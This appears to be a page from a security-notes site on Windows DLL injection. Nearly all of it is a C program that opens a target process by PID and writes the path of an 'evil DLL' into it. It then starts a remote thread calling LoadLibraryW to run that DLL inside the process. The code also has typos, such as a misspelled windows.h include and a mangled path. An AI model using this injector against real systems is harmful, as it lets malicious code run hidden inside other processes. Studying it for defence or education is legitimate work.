DLL Injection

//
#include <winddows.h>
#include <stdio.h>


int main(int argc, char *argv[]) {
	HANDLE processHandle;
	PVOID remoteBuffer;
	wchar_t dllPath[] = TEXT("C:\\eviall\\DLL"); //The evil DLL that you already have installed that you are injection into a preexisting process

	printf("Injecting DLL to PID: %i\n", atoi(argv[1]));

	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); // opening a process 

	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);	//Allocating space for the MEM

	WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL); //Writing the DLL the the Process MEM 

	PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
                /* ^^^ Retrieving the LoadLibraryW from Kernerl32  using GetProcAddress ^^^*/
	CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
        //Creating the Remote thread to inject shell code and doing it. 
	    CloseHandle(processHandle); 
	
	return 0;
}
```

LoadLibraryA function (libloaderapi.h) - Win32 appsMicrosoftLearn

GetProcAddress function (libloaderapi.h) - Win32 appsMicrosoftLearn

PreviousProcess Injection NextPEB & TEB

Last updated 9 months ago